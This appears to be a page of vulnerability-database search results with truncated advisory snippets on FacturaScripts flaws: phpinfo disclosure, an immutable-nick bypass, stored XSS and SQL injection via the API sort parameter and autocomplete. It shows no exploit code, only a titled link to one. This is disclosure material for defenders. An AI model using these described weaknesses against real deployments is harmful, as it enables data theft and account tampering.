204 matches found
PT-2026-38616
Name of the Vulnerable Software and Affected Versions FacturaScripts versions prior to v2026 Description An unauthenticated information disclosure issue in the Installer controller allows a remote attacker to trigger the phpinfo function on a fresh deployment. By requesting the endpoint "/" with...
CVE-2026-32699
FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...
CVE-2026-32699 FacturaScripts unauthorized modification of immutable nick field via EditUser controller
FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...
CVE-2026-32699
FacturaScripts (versions ≤ 2025.92) exposes a vulnerability in the EditUser endpoint where the nick field is not validated on POST, allowing an attacker to modify an immutable nickname by intercepting and altering form-data. The UI prevents editing this field, but a modified request can rename an...
EUVD-2026-27438
FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...
CVE-2026-32699 FacturaScripts unauthorized modification of immutable nick field via EditUser controller
FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...
Access Control Bypass
Overview Affected versions of this package are vulnerable to Access Control Bypass through improper validation of the nick parameter in the user update process. An attacker can modify immutable account identifiers by intercepting and altering POST requests, potentially sabotaging audit trails,...
PT-2026-35875
Name of the Vulnerable Software and Affected Versions FacturaScripts affected versions not specified Description Broken Access Control exists in the user update logic. The application fails to validate the nick parameter during a 'POST' request to the '/EditUser' endpoint. Although the user...
EUVD-2026-22282
FacturaScripts has Stored Cross-Site Scripting XSS in "Observations" field via History View...
📄 FacturaScripts SQL Injection
FacturaScripts versions prior to 2025.81 suffer from a remote SQL injection vulnerability in the API ORDER BY clause. CVE-2026-25513: FacturaScripts has SQL Injection in API ORDER BY Clause Overview | Field | Details | |---|---| | CVE ID | CVE-2026-25513 | | Severity | HIGH | | Advisory | View...
📄 FacturaScripts SQL Injection
FacturaScripts versions prior to 2025.81 suffer from a remote SQL injection vulnerability in the Autocomplete Actions functionality. CVE-2026-25514: FacturaScripts has SQL Injection in Autocomplete Actions Overview | Field | Details | |---|---| | CVE ID | CVE-2026-25514 | | Severity | HIGH | |...
Exploit for SQL Injection in Facturascripts
CVE-2026-25514: FacturaScripts has SQL Injection in Autocomple...
CVE-2026-25514
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...
CVE-2026-25513 FacturaScripts has SQL Injection vulnerability in API ORDER BY Clause
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...
EUVD-2026-5359
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...
CVE-2026-25513
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...
CVE-2026-25513 FacturaScripts has SQL Injection vulnerability in API ORDER BY Clause
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...
CVE-2026-25513
CVE-2026-25513 – FacturaScripts SQL Injection in API ORDER BY . The issue exists in FacturaScripts prior to version 2025.81, where the REST API sorts results using user-supplied values in ModelClass::getOrderBy(), directly concatenating them into the ORDER BY clause. This allows authenticated API...
CVE-2026-25514 FacturaScripts has SQL Injection vulnerability in Autocomplete Actions
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...
CVE-2026-25514 FacturaScripts has SQL Injection vulnerability in Autocomplete Actions
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...